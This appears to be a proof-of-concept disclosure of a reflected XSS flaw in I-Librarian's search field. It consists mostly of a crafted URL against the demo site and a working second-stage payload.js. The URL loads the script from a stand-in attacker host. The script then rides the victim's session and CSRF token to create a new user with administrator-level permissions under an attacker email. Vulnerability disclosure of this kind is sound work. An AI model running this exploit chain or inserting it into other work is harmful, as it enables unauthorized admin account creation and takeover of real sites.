Reflected XSS (Cross-Site Scripting) is a common web security vulnerability that can occur when a user enters malicious JavaScript syntax into the search field and the site reflects it back into the page.
The search function lets users look for content on the website, and the search keywords are appended to the URL query string. If the website fails to properly filter and reject unvalidated input in the search query string, attackers have an opportunity to inject malicious code.
Attackers can construct a malicious search query string that carries JavaScript code. When a victim opens the crafted link, the browser parses the query string and executes the JavaScript, completing the attack.
https://i-librarian.net/demo/index.php/#items/main?search_query%5B%5D=%3Cscript%20src%3D%22%2F%2Fattacker_host%2Fpayload.js%22%3E%3C%2Fscript%3E&search_boolean%5B%5D=AND&search_type%5B%5D=anywhere
# payload.js
// Second-stage script that the reflected-XSS link above loads from the
// attacker's host. Because it executes in the victim's origin it can reuse
// their session and the page's CSRF token, so neither the CSRF check nor
// SameSite cookies stop the request. The root-cause fix is output-encoding
// search_query before it reaches the DOM; a CSP that forbids remote script
// sources would additionally prevent this stage from loading at all.
function payload() {
// Form body for the user-creation endpoint (runtime string, do not edit).
// `csrfToken` is not defined in this file; presumably a global exposed by the
// host page — TODO confirm against the page's scripts.
const data = "user%5Busername%5D=&user%5Bfirst_name%5D=&user%5Blast_name%5D=&user%5Bemail%5D=attacker%40mail.com&user%5Bpermissions%5D=A&csrfToken=" + csrfToken;
const xhr = new XMLHttpRequest();
// The request URL is relative (same-origin), where cookies are sent anyway;
// this flag only matters for cross-site requests.
xhr.withCredentials = true;
// Surfaces the server's reply once the request has completed.
xhr.addEventListener("readystatechange", function () {
if (this.readyState === this.DONE) {
alert(this.responseText);
}
});
xhr.open("POST", "/index.php/users/create");
// NOTE(review): User-Agent, Accept-Encoding, Origin, DNT, Connection, Referer
// and the Sec-* names are forbidden request headers; browsers ignore
// setRequestHeader for them, so the request carries the browser's genuine
// values. When correlating server logs, match on the endpoint, method and
// X-Requested-With rather than on the values set below.
xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; rv:112.0) Gecko/20100101 Firefox/112.0");
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Accept-Encoding", "gzip, deflate, br");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("X-Client-Width", "1512");
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xhr.setRequestHeader("Origin", "https://i-librarian.net");
xhr.setRequestHeader("DNT", "1");
xhr.setRequestHeader("Connection", "keep-alive");
xhr.setRequestHeader("Referer", "https://i-librarian.net/");
xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
xhr.setRequestHeader("Sec-Fetch-Mode", "cors");
xhr.setRequestHeader("Sec-Fetch-Site", "same-origin");
xhr.setRequestHeader("Sec-GPC", "1");
xhr.setRequestHeader("Pragma", "no-cache");
xhr.setRequestHeader("Cache-Control", "no-cache");
xhr.send(data);
}
// Fixed 2 s delay before the request fires — presumably to let the host page
// finish initializing (e.g. defining csrfToken). This is a timing assumption,
// not a synchronization, so the call can race page load.
setTimeout(payload, 2000);